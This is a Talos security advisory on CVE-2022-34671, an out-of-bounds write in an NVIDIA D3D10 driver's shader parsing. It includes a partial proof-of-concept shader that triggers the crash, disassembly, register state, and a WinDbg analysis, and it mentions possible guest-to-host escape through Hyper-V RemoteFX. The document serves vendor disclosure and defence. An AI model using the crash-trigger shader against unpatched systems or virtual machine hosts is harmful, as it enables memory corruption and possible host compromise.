CVE-2022-34671
A memory corruption vulnerability exists in the Shader Functionality of NVIDIA D3D10 Driver NVIDIA D3D10 Driver, Version 528.24, 31.0.15.2824. A specially crafted executable/shader file containing a dcl_resource_structured declaration with an out-of-bounds index can lead to memory corruption. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability potentially could be triggered from guest machines running virtualization environments (ie. VMware, qemu, VirtualBox etc.) in order to perform guest-to-host escape, as previously demonstrated (TALOS-2018-0533, TALOS-2018-0568, etc.). Theoretically this vulnerability could also be triggered from web browser (using webGL and webassembly). We were able to trigger this vulnerability from HYPER-V guest using the RemoteFX feature, leading to execution of vulnerable code on the HYPER-V host (inside of the rdvgm.exe process). While the RemoteFX was recently deprecated by Microsoft, some older machines may still use this software.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
NVIDIA D3D10 Driver NVIDIA D3D10 Driver, Version 528.24, 31.0.15.2824
D3D10 Driver - https://nvidia.com
8.5 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-787 - Out-of-bounds Write
NVIDIA Graphics drivers is software for NVIDIA Graphics GPU installed on the PC. It is used to communicate between the operating system and the GPU device. This software is required in most cases for the hardware device to function properly.
This vulnerability can be triggered by supplying a malformed shader. This leads to a memory corruption problem in NVIDIA driver.
Example of shader triggering the bug:
cs_5_0
dcl_globalFlags refactoringAllowed
dcl_constantbuffer cb0[5], immediateIndexed
dcl_resource_structured t0, 16
dcl_resource_structured <unknown register type 226>, 33554527 // dcl_resource_structured atomic_umax[288231054756544520][0][u0]
...
dcl_resource_structured is an instruction which declares a shader resource input and assigns it to a t#—a placeholder register for the resource.
By specifying out-of-bounds values as an operand to this instruction, an attacker is able to trigger this memory corruption vulnerability.
rax=0000000000000000 rbx=00000256723d3990 rcx=000000000000100b
rdx=0000000000000800 rsi=000000762c0dedb0 rdi=000000762c0dedb0
rip=00007ff9c06d54a5 rsp=000000762c0ded08 rbp=000000000400009e
r8=00000256723d3990 r9=000000000000000b r10=000000000400009e
r11=00000256723d5c50 r12=00000256723d5c50 r13=00007ff9c0110000
r14=000000000400009e r15=0000000000000001
iopl=0 no up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
00007FF9C06D5485 | e80583e11f | call 0x7ff9e04ed78f
00007FF9C06D548A | ba01000000 | mov edx, 0x1
00007FF9C06D548F | d3e2 | shl edx, cl
00007FF9C06D5491 | 4c8d0483 | lea r8, [rbx+rax*4]
00007FF9C06D5495 | 4109903c030000 | or [r8+0x33c], edx
00007FF9C06D549C | 8b8b38030000 | mov ecx, [rbx+0x338]
00007FF9C06D54A2 | 4103c9 | add ecx, r9d
* 00007FF9C06D54A5 | 42898c93d00b0000 | mov [rbx+r10*4+0xbd0], ecx
00007FF9C06D54AD | 488b5c2410 | mov rbx, [rsp+0x10]
00007FF9C06D54B2 | 488b7c2418 | mov rdi, [rsp+0x18]
RBX register value is calculated directly from the shader bytecode.
nvwgf2umx!NVAPI_Thunk+0x2a04f5:
00007ff9`c06d54a5 42898c93d00b0000 mov dword ptr [rbx+r10*4+0BD0h],ecx ds:000001fd`62999a38=????????
0:022> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for POC_EXEC11.exe
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Write
Key : Analysis.CPU.mSec
Value: 3124
Key : Analysis.DebugAnalysisManager
Value: Create
Key : Analysis.Elapsed.mSec
Value: 16674
Key : Analysis.Init.CPU.mSec
Value: 1217
Key : Analysis.Init.Elapsed.mSec
Value: 27238
Key : Analysis.Memory.CommitPeak.Mb
Value: 94
Key : Timeline.OS.Boot.DeltaSec
Value: 99472
Key : Timeline.Process.Start.DeltaSec
Value: 8
Key : WER.OS.Branch
Value: vb_release
Key : WER.OS.Timestamp
Value: 2019-12-06T14:06:00Z
Key : WER.OS.Version
Value: 10.0.19041.1
NTGLOBALFLAG: 70
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ff9c06d54a5 (nvwgf2umx!NVAPI_Thunk+0x00000000002a04f5)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000001
Parameter[1]: 000001fd62999a38
Attempt to write to address 000001fd62999a38
FAULTING_THREAD: 00005100
PROCESS_NAME: POC_EXEC11.exe
WRITE_ADDRESS: 000001fd62999a38
ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si do pami ci pod adresem 0x%p. Pami nie mo e by %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000001
EXCEPTION_PARAMETER2: 000001fd62999a38
STACK_TEXT:
000000e5`f695ea78 00007ff9`c06d55e2 : 00000000`0400009e 00000000`0400009e 000001fd`52998bf0 000001fd`00000000 : nvwgf2umx!NVAPI_Thunk+0x2a04f5
000000e5`f695ea80 00007ff9`c03d902d : 00000000`00000000 000001fd`52998bf0 00007ff9`c041cbb4 000000e5`f695f030 : nvwgf2umx!NVAPI_Thunk+0x2a0632
000000e5`f695eb00 00007ff9`c03d7d36 : 00000000`d54d58a2 000000e5`f695f030 00000000`d54d58a2 00000000`d54d5ba1 : nvwgf2umx!NVDEV_Thunk+0x61c3d
000000e5`f695efb0 00007ff9`c01f26c3 : 000001fd`5296e248 00000000`00000000 000001fd`5299e2e0 000000e5`f695f440 : nvwgf2umx!NVDEV_Thunk+0x60946
000000e5`f695f060 00007ff9`c01f3c6d : 000001fd`5296e248 00007ff9`d54d47b1 000001fd`4e744000 000001fd`4c8a0000 : nvwgf2umx+0xe26c3
000000e5`f695f160 00007ff9`c04410a5 : 000001fd`4e7dee00 000001fd`5296e338 000001fd`5296e248 000001fd`5296e310 : nvwgf2umx+0xe3c6d
000000e5`f695f3f0 00007ff9`c02f5fb8 : 000001fd`529b47e8 00000000`0000ffff 000001fd`4e6fb048 000001fd`5296e310 : nvwgf2umx!NVAPI_Thunk+0xc0f5
000000e5`f695f550 00007ff9`c144e9bf : 000001fd`0000002a 000001fd`00000000 000001fd`00000000 000001fd`4e7ddfb0 : nvwgf2umx!NVENCODEAPI_Thunk+0x77718
000000e5`f695f620 00007ff9`c144e91f : 00000000`00000001 00000000`00000000 00000000`000007d0 000001fd`4e7ddfb0 : nvwgf2umx!NVAPI_Thunk+0x1019a0f
000000e5`f695f650 00007ff9`c1443c4d : 000001fd`4e7de4f0 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVAPI_Thunk+0x101996f
000000e5`f695f6d0 00007ff9`c0653b6a : 00000000`00000000 000001fd`4e70d4b0 00000000`00000000 00000000`00000000 : nvwgf2umx!NVAPI_Thunk+0x100ec9d
000000e5`f695f700 00007ff9`c1c37472 : 000001fd`4e6f1c00 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVAPI_Thunk+0x21ebba
000000e5`f695f730 00007ff9`d5387614 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!OpenAdapter12+0x619382
000000e5`f695f760 00007ff9`d55026a1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
000000e5`f695f790 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
SYMBOL_NAME: nvwgf2umx!NVAPI_Thunk+2a04f5
MODULE_NAME: nvwgf2umx
IMAGE_NAME: nvwgf2umx.dll
STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~22s ; .cxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_nvwgf2umx.dll!NVAPI_Thunk
BUCKET_ID_MODPRIVATE: 1
OS_VERSION: 10.0.19041.1
BUILDLAB_STR: vb_release
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
IMAGE_VERSION: 31.0.15.2824
FAILURE_ID_HASH: {394d2a7d-b34b-6afc-ef2e-834df1b40588}
Followup: MachineOwner
---------
NVidia released a bulletin for the issues here: https://nvidia.custhelp.com/app/answers/detail/a_id/5468
2023-02-16 - Vendor Disclosure
2023-06-27 - Vendor Patch Release
2023-08-10 - Public Release
Discovered by Piotr Bania of Cisco Talos.